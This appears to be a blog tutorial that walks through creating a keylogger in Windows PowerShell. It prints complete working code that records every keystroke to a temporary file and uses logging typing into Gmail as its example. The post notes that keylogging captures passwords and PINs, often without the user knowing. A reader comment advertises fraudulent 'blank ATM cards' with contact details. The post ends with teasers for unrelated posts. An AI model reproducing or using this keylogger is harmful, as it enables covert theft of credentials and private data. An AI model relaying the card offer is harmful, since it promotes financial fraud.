How to create a simple keylogger yourself in windows: – Keylogging is the process of recording the key presses made on a keyboard on to a log. This is often done without the awareness of the user. Keylogging is widely used as a hacking trick as well. Using keylogging, all the keypresses made on a keyboard can be efficiently recorded. This can include passwords, usernames, secret pins, confidential data etc. Keylogging can be used to detect trespassing as well. In this article, a windows framework known as Powershell is used to create a simple keylogger. It consists of a command-line shell and associated scripting language. Powershell is built on the .NET framework and is used widely for various applications.
STEP 1
  • Spread out the Start menu. Type in Windows PowerShell in the search bar. From the search results, open the applications Windows PowerShell and Windows PowerShell ISE as shown in the screenshot.
1search
STEP 2
  • Click on Windows PowerShell icon in the task bar. This will result in the popping up of Windows PowerShell command prompt.
2powerShell
STEP 3
  • Copy the code given below and paste it onto the Windows PowerShell command prompt. To copy or paste, you just need to select the code and right click, in the PowerShell command prompt.
    #requires -Version 2
function Start-KeyLogger($Path="$env:temp\keylogger.txt") 
{
  # Signatures for API Calls
  $signatures = @'
[DllImport("user32.dll", CharSet=CharSet.Auto, ExactSpelling=true)] 
public static extern short GetAsyncKeyState(int virtualKeyCode); 
[DllImport("user32.dll", CharSet=CharSet.Auto)]
public static extern int GetKeyboardState(byte[] keystate);
[DllImport("user32.dll", CharSet=CharSet.Auto)]
public static extern int MapVirtualKey(uint uCode, int uMapType);
[DllImport("user32.dll", CharSet=CharSet.Auto)]
public static extern int ToUnicode(uint wVirtKey, uint wScanCode, byte[] lpkeystate, System.Text.StringBuilder pwszBuff, int cchBuff, uint wFlags);
'@

  # load signatures and make members available
  $API = Add-Type -MemberDefinition $signatures -Name 'Win32' -Namespace API -PassThru
    
  # create output file
  $null = New-Item -Path $Path -ItemType File -Force

  try
  {
    Write-Host 'Recording key presses. Press CTRL+C to see results.' -ForegroundColor Red

    # create endless loop. When user presses CTRL+C, finally-block
    # executes and shows the collected key presses
    while ($true) {
      Start-Sleep -Milliseconds 40
      
      # scan all ASCII codes above 8
      for ($ascii = 9; $ascii -le 254; $ascii++) {
        # get current key state
        $state = $API::GetAsyncKeyState($ascii)

        # is key pressed?
        if ($state -eq -32767) {
          $null = [console]::CapsLock

          # translate scan code to real code
          $virtualKey = $API::MapVirtualKey($ascii, 3)

          # get keyboard state for virtual keys
          $kbstate = New-Object Byte[] 256
          $checkkbstate = $API::GetKeyboardState($kbstate)

          # prepare a StringBuilder to receive input key
          $mychar = New-Object -TypeName System.Text.StringBuilder

          # translate virtual key
          $success = $API::ToUnicode($ascii, $virtualKey, $kbstate, $mychar, $mychar.Capacity, 0)

          if ($success) 
          {
            # add key to logger file
            [System.IO.File]::AppendAllText($Path, $mychar, [System.Text.Encoding]::Unicode) 
          }
        }
      }
    }
  }
  finally
  {
    # open logger file in Notepad
    notepad $Path
  }
}

# records all key presses until script is aborted by pressing CTRL+C
# will then open the file with collected key codes
Start-KeyLogger
STEP 4
  • Now the Windows PowerShell will look like the following screenshot.
3copyCode
STEP 5
  • Now open some application and press some keys. I have opened G-Mail as an example.

STEP 6
  • Once you are done with pressing keys, look at the bottom of the code in the Windows PowerShell command prompt. There you will see an instruction Recording key presses. Press CTRL+C to see results. Press CTRL+Cas per the instruction to see the logged keystrokes.
STEP 7
  • Pressing CTRL+C will result in the opening of a notepad file, which has the recorded keystrokes.
5notepad
STEP 8
  • Alternatively, you can open the Windows PowerShell ISE as shown in the first step and copy the code. As next, click on the Play icon to run the script. This will also give the same result.
6PowerShellISE

Comments

  1. siqing chenNovember 23, 2020 at 7:50 PM

    I am a Single full time dad on disability getting no help from their moms. It a struggle every day. My boys are 15 and 9 been doing this by myself for 8 years now it’s completely drained all my savings everything . These guys are the present day ROBIN HOOD. Im back on my feet again and my kids can have a better life all thanks to the blank card i acquired from skylink technology. Now i can withdraw up too 3000 per day Contact them as well on Mail: skylinktechnes@yahoo.com   or   whatsspp/telegram: +1(213)785-1553

    ReplyDelete

Post a Comment

Popular posts from this blog

MTN uganda on is on fire because of espionage,fraud,tax evasion and unfair competetive tendencies

MTN uganda must have faced the toughest times in its business spel for the beginning of this year.But as many may be aware,MTN's problem are not of today only but a series of mistakes and misunderstanding that gradually escalated from around mid 2010 through to early days of 2019.The most alarming of these mistakes was the unsurety of the customers privacy and the unrealistic licence it got after a long sacffle with the government of the republic of uganda. Many people have been wondering how or if its true that mtn and its staff was involved in data leakages,exposing customers privacy to intrusion or any sort of espionage.on the first two i can assure you that mtn face data leakages and its customers were exposed to dangers of loosing their private data to dubious intruders,plus fraudulent acts that did occur mostly on mobile money services,its really annoying that mtn when contacted on these fraudulent issues alway would take a low pace and in most case ignore it in tge long end
Read more

United kingdom's Coronavirus Contact Tracing App Assists 'Surveillance State'

Image
In the letter, the signatories - which include tech justice NGO Foxglove and digital rights campaigners Access Now - say the proposed app could be another step towards a surveillance state. Campaign groups have written an open letter to UK Prime Minister Boris Johnson warning GCHQ and its digital arm, the National Cyber Security Centre (NCSC), will have the capacity to re-identify the phones of people who install the country’s coronavirus contact-tracing app. They also note the legal framework underpinning the software, which is currently being trialled on the Isle of Wight, is believed to be inadequate to protect people from misuse of their data by the Joint Committee on Human Rights. “Parliament has to quickly issue an adequate legal framework that guarantees users’ human rights protection. In addition, contrary to some recommendations, the app the Government is trialling uses a centralised model for the collection, processing and storage of users’ data. The centralised rec
Read more

Citzens have done a great work in the arrest of an armed robber

Vigilant residents arrest armed man Residents of Kiwatule this afternoon foiled an attempted robbery in Kiwatule after gunman entered Liquid Cash Emergency Loans with intent to rob. The suspect, Isaac Mulengenyi, 23, reportedly fired in the air to scare onlookers however mob charged at him, arrested and handed him to police. A case of aggravated robbery has been opened at Ntinda Police Station Vide CRB 123/2019 while a rifle has been recovered with nine rounds of ammunition. The suspect is still being detained at Ntinda pending appearance before court.
Read more